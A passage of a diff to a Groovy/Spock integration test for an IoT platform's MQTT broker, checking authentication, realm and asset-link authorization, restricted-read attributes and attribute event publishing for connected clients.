-            assert asst.getAttribute("co2Level").get().value.orElse(-100) == currentCO2Level
-        }
-
-        when: "a restricted mqtt client subscribes to an unlinked asset"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1BathroomId".toString()
-        newClient.addMessageConsumer(topic, {msg ->})
-
-        then: "the subscription should fail but the consumer should still exist (as setRemoveConsumersOnSubscriptionFailure=false)"
-        conditions.eventually {
-            assert subFailures.contains(topic)
-            assert newClient.topicConsumerMap.get(topic) != null
-            assert newClient.topicConsumerMap.get(topic).consumers.size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "a restricted mqtt client subscribes to a linked asset"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
-        newClient.addMessageConsumer(topic, {msg ->})
-
-        then: "a subscription should exist"
-        conditions.eventually {
-            assert newClient.topicConsumerMap.get(topic) != null
-            assert newClient.topicConsumerMap.get(topic).consumers.size() == 1
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
-        }
-
-        when: "a user asset link is added for a connected restricted user"
-        existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-        assetStorageService.storeUserAssetLinks(List.of(
-                new UserAssetLink(keycloakTestSetup.realmBuilding.getName(),
-                        keycloakTestSetup.serviceUser2.getId(),
-                        managerTestSetup.apartment1BathroomId)))
-
-        then: "the existing connection should be terminated and the client should reconnect and the previously failed subscription should now succeed"
-        conditions.eventually {
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "a user asset link is removed for a connected restricted user"
-        existingConnection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-        assetStorageService.deleteUserAssetLinks(List.of(
-                new UserAssetLink(keycloakTestSetup.realmBuilding.getName(),
-                        keycloakTestSetup.serviceUser2.getId(),
-                        managerTestSetup.apartment1HallwayId)))
-
-        then: "the existing connection should be terminated and the client should reconnect and the previously failed subscription should be tried again but also fail"
-        conditions.eventually {
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
-        }
-
-        when: "the restricted mqtt client removes all subscriptions"
-        newClient.removeAllMessageConsumers() // Clear subscriptions as otherwise it won't hit the server again
-
-        then: "no subscriptions should exist in the client"
-        assert newClient.topicConsumerMap.isEmpty()
-
-        Consumer<MQTTMessage<String>> restrictedEventConsumer = { msg ->
-            def event = ValueUtil.parse(msg.payload as String, SharedEvent.class)
-            restrictedReceivedEvents.add(event.get())
-        }
-
-        when: "the restricted mqtt client subscribes to a now unlinked asset"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
-        newClient.addMessageConsumer(topic, restrictedEventConsumer)
-
-        then: "no subscription should exist"
-        conditions.eventually {
-            assert subFailures.contains(topic)
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "the previously failed message consumer is removed"
-        newClient.removeMessageConsumer(topic, restrictedEventConsumer)
-
-        and: "a restricted mqtt client subscribes to the attribute wildcard topic"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
-        newClient.addMessageConsumer(topic, restrictedEventConsumer)
-
-        then: "a subscription should exist"
-        conditions.eventually {
-            assert newClient.topicConsumerMap.get(topic) != null
-            def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0]
-            assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
-        }
-
-        when: "an unlinked asset attribute event occurs"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 40)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "the restricted client should not receive the event"
-        conditions.eventually {
-            assert restrictedReceivedEvents.size() == 0
-        }
-
-        when: "a linked asset attribute event occurs"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1BathroomId, RoomAsset.ROOM_NUMBER, 1)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "the restricted client should not receive the event since the attribute is not restricted"
-        conditions.eventually {
-            assert restrictedReceivedEvents.size() == 0
-        }
-
-        when: "a linked asset attribute has its restricted meta configuration set to true"
-        def bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
-        bathroomAsset.getAttributes().get(RoomAsset.ROOM_NUMBER).get().addOrReplaceMeta(new MetaItem<>(ACCESS_RESTRICTED_READ, true))
-        assetStorageService.merge(bathroomAsset)
-
-        then: "the restricted client should still be connected"
-        conditions.eventually {
-            assert newClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-        }
-
-        then: "the restricted client should receive the triggered attribute event"
-            conditions.eventually {
-            assert restrictedReceivedEvents.size() == 1
-        }
-        restrictedReceivedEvents.clear()
-
-        when: "another attribute event occurs on the restricted read attribute"
-        attributeEvent = new AttributeEvent(managerTestSetup.apartment1BathroomId, RoomAsset.ROOM_NUMBER, 2)
-        assetProcessingService.sendAttributeEvent(attributeEvent)
-
-        then: "the restricted client should receive the triggered attribute event"
-         conditions.eventually {
-            assert restrictedReceivedEvents.size() == 1
-            assert restrictedReceivedEvents.get(0) == attributeEvent
-        }
-        restrictedReceivedEvents.clear()
-
-        when: "the restricted read meta item is removed"
-        bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
-        bathroomAsset.getAttributes().addOrReplace(new Attribute<>(RoomAsset.ROOM_NUMBER, 2))
-        assetStorageService.merge(bathroomAsset)
-
-        then: "the restricted client should not receive the triggered attribute event"
-            conditions.eventually {
-            assert restrictedReceivedEvents.size() == 0
-        }
-        newClient.removeAllMessageConsumers()
-        restrictedReceivedEvents.clear()
-
-        when: "a restricted mqtt client subscribes to the asset wildcard topic"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ASSET_TOPIC/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
-        newClient.addMessageConsumer(topic, restrictedEventConsumer)
-
-        then: "a subscription should exist"
-        conditions.eventually {
-            assert newClient.topicConsumerMap.get(topic) != null
-        }
-
-        when: "a linked asset event occurs"
-        bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
-        bathroomAsset.getAttributes().get(RoomAsset.ROOM_NUMBER).get().setValue(2)
-        assetStorageService.merge(bathroomAsset)
-
-        then: "the restricted client should receive the triggered asset event"
-        conditions.eventually {
-            assert restrictedReceivedEvents.size() == 1
-        }
-
-        and: "the event should only contain attributes that are read restricted"
-        conditions.eventually {
-            assert restrictedReceivedEvents.size() == 1
-            def event = restrictedReceivedEvents.get(0)
-            assert event instanceof AssetEvent
-            def assetEvent = event as AssetEvent
-            assert !assetEvent.getAsset().hasAttribute(RoomAsset.ROOM_NUMBER)
-        }
-        restrictedReceivedEvents.clear()
-
-        when: "the restricted read meta item is added again"
-        bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
-        bathroomAsset.getAttributes().get(RoomAsset.ROOM_NUMBER).get().addOrReplaceMeta(new MetaItem<>(ACCESS_RESTRICTED_READ, true))
-        assetStorageService.merge(bathroomAsset)
-
-        then: "the restricted client should receive the triggered asset event"
-        conditions.eventually {
-            assert restrictedReceivedEvents.size() == 1
-            def event = restrictedReceivedEvents.get(0)
-            assert event instanceof AssetEvent
-            def assetEvent = event as AssetEvent
-            assert assetEvent.getAsset().getAttribute(RoomAsset.ROOM_NUMBER).isPresent()
-            assert assetEvent.getAsset().getAttribute(RoomAsset.ROOM_NUMBER).get().getValue().orElse(null) == 2
-        }
-        restrictedReceivedEvents.clear()
-
-        when: "the asset is unlinked"
-        assetStorageService.deleteUserAssetLinks(List.of(
-                new UserAssetLink(keycloakTestSetup.realmBuilding.getName(),
-                        keycloakTestSetup.serviceUser2.getId(),
-                        managerTestSetup.apartment1BathroomId)))
-
-
-        then: "the existing connection should be terminated and the client should reconnect"
-        conditions.eventually {
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).size() == 1
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id)[0] !== existingConnection
-        }
-
-        when: "the restricted mqtt client removes all subscriptions"
-        newClient.removeAllMessageConsumers() // Clear subscriptions as otherwise it won't hit the server again
-
-        then: "no subscriptions should exist in the client"
-        assert newClient.topicConsumerMap.isEmpty()
-
-        when: "the restricted mqtt client subscribes to the asset wildcard topic again"
-        topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ASSET_TOPIC/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
-        newClient.addMessageConsumer(topic, restrictedEventConsumer)
-
-        then: "a subscription should exist"
-        conditions.eventually {
-            assert newClient.topicConsumerMap.get(topic) != null
-        }
-
-        when: "an asset event occurs on the now unlinked asset"
-        bathroomAsset = assetStorageService.find(managerTestSetup.apartment1BathroomId)
-        bathroomAsset.getAttributes().get(RoomAsset.ROOM_NUMBER).get().setValue(2)
-        assetStorageService.merge(bathroomAsset)
-
-        then: "the restricted client should not receive the triggered asset event"
-        conditions.eventually {
-            assert restrictedReceivedEvents.size() == 0
-        }
-        restrictedReceivedEvents.clear()
-        newClient.removeAllMessageConsumers()
-
-        when: "both MQTT clients disconnect"
-        client.disconnect()
-        newClient.disconnect()
-
-        then: "no connections should be left"
-        conditions.eventually {
-            assert client.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-            assert newClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser2.id).isEmpty()
-            assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
-        }
-
-        cleanup: "disconnect the clients"
-        if (client != null) {
-            client.disconnect()
-        }
-        if (newClient != null) {
-            newClient.disconnect()
-        }
+  def "Mqtt broker event test"() {
+    given: "the container environment is started"
+    List<SharedEvent> receivedEvents = new CopyOnWriteArrayList<>()
+    List<SharedEvent> restrictedReceivedEvents = new CopyOnWriteArrayList<>()
+    List<Object> receivedValues = new CopyOnWriteArrayList<>()
+    List<ConnectionStatus> clientConnectionStatuses = new CopyOnWriteArrayList<>()
+    MQTT_IOClient client = null
+    MQTT_IOClient newClient = null
+    def conditions = new PollingConditions(timeout: 15, initialDelay: 0.1, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def mqttBrokerService = container.getService(MQTTBrokerService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def defaultMQTTHandler = mqttBrokerService.getCustomHandlers().find {
+      it instanceof DefaultMQTTHandler
+    } as DefaultMQTTHandler
+    def mqttClientId = UniqueIdentifierGenerator.generateId()
+    def username = keycloakTestSetup.realmBuilding.name + ":" + keycloakTestSetup.serviceUser.username // realm and OAuth client id
+    def password = keycloakTestSetup.serviceUser.secret
+
+    def mqttHost = getString(container.getConfig(), MQTT_SERVER_LISTEN_HOST, "0.0.0.0")
+    def mqttPort = getInteger(container.getConfig(), MQTT_SERVER_LISTEN_PORT, 1883)
+
+    when: "a mqtt client connects with invalid credentials"
+    def wrongUsername = "master:" + keycloakTestSetup.serviceUser.username
+    client = new MQTT_IOClient(mqttClientId, mqttHost, mqttPort, false, true, new UsernamePassword(wrongUsername, password), null, null)
+    client.addConnectionStatusConsumer {clientConnectionStatuses.add(it)}
+    client.connect()
+
+    then: "the client should fail connection and retry"
+    conditions.eventually {
+      assert clientConnectionStatuses.contains(ConnectionStatus.CONNECTING)
+      assert clientConnectionStatuses.contains(ConnectionStatus.WAITING)
     }
 
-    /**
-     * A last will publish is only accepted while the broker can still resolve the closed connection, which it keeps for
-     * 3s, so a publish consumer that is held up for longer drops the will and no amount of polling recovers it.
-     */
-    private static void widenDisconnectedConnectionWindow(MQTTBrokerService mqttBrokerService) {
-        mqttBrokerService.@disconnectedConnectionCache = CacheBuilder.newBuilder()
-                .maximumSize(10000)
-                .expireAfterWrite(Duration.ofSeconds(60))
-                .build()
+    when: "the client disconnects"
+    client.disconnect()
+
+    then: "the status should be reported and reconnect cancelled"
+    conditions.eventually {
+      assert clientConnectionStatuses.contains(ConnectionStatus.DISCONNECTED)
     }
+
+    when: "a mqtt client connects with valid credentials"
+    mqttClientId = UniqueIdentifierGenerator.generateId()
+    client = new MQTT_IOClient(mqttClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username, password), null, null)
+    client.connect()
+
+    then: "mqtt connection should exist"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
+    }
+
+    when: "the client disconnects"
+    mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+    client.disconnect()
+
+    then: "the client resources should be freed"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).isEmpty()
+    }
+
+    when: "a mqtt client connects with valid credentials"
+    List<String> subFailures = new CopyOnWriteArrayList<>()
+    mqttClientId = UniqueIdentifierGenerator.generateId()
+    client = new MQTT_IOClient(mqttClientId, mqttHost, mqttPort, false, true, new UsernamePassword(username, password), null, null)
+    client.setTopicSubscribeFailureConsumer {subFailures.add(it)}
+    client.setRemoveConsumersOnSubscriptionFailure(true)
+    client.connect()
+
+    then: "mqtt connection should exist"
+    conditions.eventually {
+      assert client.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
+    }
+
+    when: "a mqtt client subscribes to an asset in another realm"
+    def topic = "${keycloakTestSetup.realmCity.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.thingId".toString()
+    client.addMessageConsumer(topic, {msg -> })
+
+    then: "No subscription should exist"
+    conditions.eventually {
+      // A client re-subscribes its retained consumers whenever it reconnects, so failures can be reported more
+      // than once and the total count is not stable
+      assert subFailures.contains(topic)
+      assert client.topicConsumerMap.get(topic) == null // Consumer added and removed on failure
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "a mqtt client subscribes with clientId missing"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
+    client.addMessageConsumer(topic, {msg ->})
+
+    then: "No subscription should exist"
+    conditions.eventually {
+      assert subFailures.contains(topic)
+      assert client.topicConsumerMap.get(topic) == null // Consumer added and removed on failure
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "a mqtt client subscribes with different clientId"
+    def newClientId = UniqueIdentifierGenerator.generateId()
+    topic = "${keycloakTestSetup.realmBuilding.name}/$newClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
+    client.addMessageConsumer(topic, {msg ->})
+
+    then: "No subscription should exist"
+    conditions.eventually {
+      assert subFailures.contains(topic)
+      assert client.topicConsumerMap.get(topic) == null // Consumer added and removed on failure
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "a mqtt client subscribes to all attributes of an asset"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
+    Consumer<MQTTMessage<String>> eventConsumer = { msg ->
+      def event = ValueUtil.parse(msg.payload as String, SharedEvent.class)
+      receivedEvents.add(event.get())
+    }
+    client.addMessageConsumer(topic, eventConsumer)
+
+    then: "A subscription should exist"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) != null
+      assert client.topicConsumerMap.get(topic).consumers.size() == 1
+      assert mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id).size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
+    }
+
+    when: "An attribute event occurs for a subscribed attribute"
+    def attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 50)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "A publish event message should be sent"
+    conditions.eventually {
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 50
+    }
+    receivedEvents.clear()
+
+    when: "Another asset attribute changed the client is subscribed on"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "presenceDetected", true)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "A second publish event message should be sent"
+    conditions.eventually {
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "presenceDetected"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(false) == true
+    }
+    receivedEvents.clear()
+
+    when: "a mqtt client publishes to an asset attribute"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/motionSensor/${managerTestSetup.apartment1HallwayId}".toString()
+    def payload = "70"
+    client.sendMessage(new MQTTMessage<String>(topic, payload))
+
+    then: "The value of the attribute should be updated and the client should have received the event"
+    new PollingConditions(initialDelay: 1, timeout: 10, delay: 1).eventually {
+      assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("motionSensor").get().value.orElse(0) == 70d
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 70d
+    }
+    receivedEvents.clear()
+
+    when: "a mqtt client publishes to an asset attribute"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/lights/${managerTestSetup.apartment1HallwayId}".toString()
+    payload = Boolean.FALSE.toString()
+    client.sendMessage(new MQTTMessage<String>(topic, payload))
+
+    then: "the value of the attribute should be updated and the client should have received the event"
+    conditions.eventually {
+      assert !assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("lights").get().value.orElse(true)
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "lights"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(true) == false
+    }
+    receivedEvents.clear()
+
+    when: "a mqtt client publishes to an asset attribute value"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_WRITE_TOPIC/lights/$managerTestSetup.apartment1HallwayId".toString()
+    payload = ValueUtil.asJSON(true).orElse(null)
+    client.sendMessage(new MQTTMessage<String>(topic, payload))
+
+    then: "the value of the attribute should be updated and the client should have received the event"
+    conditions.eventually {
+      assert assetStorageService.find(managerTestSetup.apartment1HallwayId).getAttribute("lights").get().value.orElse(false)
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "lights"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(false) == true
+    }
+    receivedEvents.clear()
+
+    when: "a mqtt client unsubscribes from an asset"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId".toString()
+    client.removeMessageConsumer(topic, eventConsumer)
+
+    then: "No subscription should exist"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) == null
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "another asset attribute changed without any subscriptions"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "presenceDetected", false)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "No publish event message should be sent"
+    new PollingConditions(initialDelay: 1, delay: 1, timeout: 10).eventually {
+      assert receivedEvents.size() == 0
+    }
+
+    when: "a mqtt client subscribes to a specific asset attribute"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/motionSensor/$managerTestSetup.apartment1HallwayId".toString()
+    client.addMessageConsumer(topic, eventConsumer)
+
+    then: "the subscription should be created"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) != null
+      assert client.topicConsumerMap.get(topic).consumers.size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
+    }
+
+    when: "that attribute changes"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 30)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "a publish event message should be sent to the client"
+    conditions.eventually {
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 30
+    }
+    receivedEvents.clear()
+
+    when: "another asset attribute changed without any subscriptions on that attribute"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "presenceDetected", true)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "no publish event message should be sent"
+    new PollingConditions(initialDelay: 1, delay: 1, timeout: 10).eventually {
+      assert receivedEvents.size() == 0
+    }
+
+    when: "a mqtt client unsubscribes from an asset attribute"
+    client.removeMessageConsumer(topic, eventConsumer)
+
+    then: "No subscription should exist"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) == null
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+    }
+
+    when: "a mqtt client subscribes to attributes for descendants of an asset"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_TOPIC/$MQTTHandler.TOKEN_SINGLE_LEVEL_WILDCARD/$managerTestSetup.apartment1HallwayId/$MQTTHandler.TOKEN_MULTI_LEVEL_WILDCARD".toString()
+    client.addMessageConsumer(topic, eventConsumer)
+
+    then: "a subscription should exist"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) != null
+      assert client.topicConsumerMap.get(topic).consumers.size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 1
+    }
+
+    when: "a child asset of the subscription attribute event occurs"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 40)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "a publish event message should be sent"
+    conditions.eventually {
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 40
+    }
+    receivedEvents.clear()
+
+    when: "a mqtt client subscribes to an asset attribute value"
+    topic = "${keycloakTestSetup.realmBuilding.name}/$mqttClientId/$DefaultMQTTHandler.ATTRIBUTE_VALUE_TOPIC/motionSensor/$managerTestSetup.apartment1HallwayId".toString()
+    Consumer<MQTTMessage<String>> valueConsumer = { msg ->
+      receivedValues.add(msg.payload)
+    }
+    client.addMessageConsumer(topic, valueConsumer)
+
+    then: "the subscription should be created"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) != null
+      assert client.topicConsumerMap.get(topic).consumers.size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.get(getConnectionIDString(connection)).size() == 2
+    }
+
+    when: "a subscribed attribute changes"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "motionSensor", 50)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "A publish value message should be sent to both subscriptions"
+    conditions.eventually {
+      assert receivedValues.size() == 1
+      assert receivedValues.get(0) == "50"
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "motionSensor"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(0) == 50
+    }
+    receivedEvents.clear()
+    receivedValues.clear()
+
+    when: "a subscribed attribute changes"
+    attributeEvent = new AttributeEvent(managerTestSetup.apartment1HallwayId, "presenceDetected", false)
+    assetProcessingService.sendAttributeEvent(attributeEvent)
+
+    then: "only the wildcard subscription should have received a publish"
+    conditions.eventually {
+      assert receivedEvents.size() == 1
+      assert receivedEvents.get(0) instanceof AttributeEvent
+      assert (receivedEvents.get(0) as AttributeEvent).id == managerTestSetup.apartment1HallwayId
+      assert (receivedEvents.get(0) as AttributeEvent).name == "presenceDetected"
+      assert (receivedEvents.get(0) as AttributeEvent).value.orElse(true) == false
+      assert receivedValues.size() == 0
+    }
+
+    when: "the client unsubscribes from the attribute value topic"
+    client.removeMessageConsumer(topic, valueConsumer)
+
+    then: "only one subscription should remain"
+    conditions.eventually {
+      assert client.topicConsumerMap.get(topic) == null
+      assert client.topicConsumerMap.size() == 1
+      def connection = mqttBrokerService.getUserConnections(keycloakTestSetup.serviceUser.id)[0]
+      assert defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(connection))
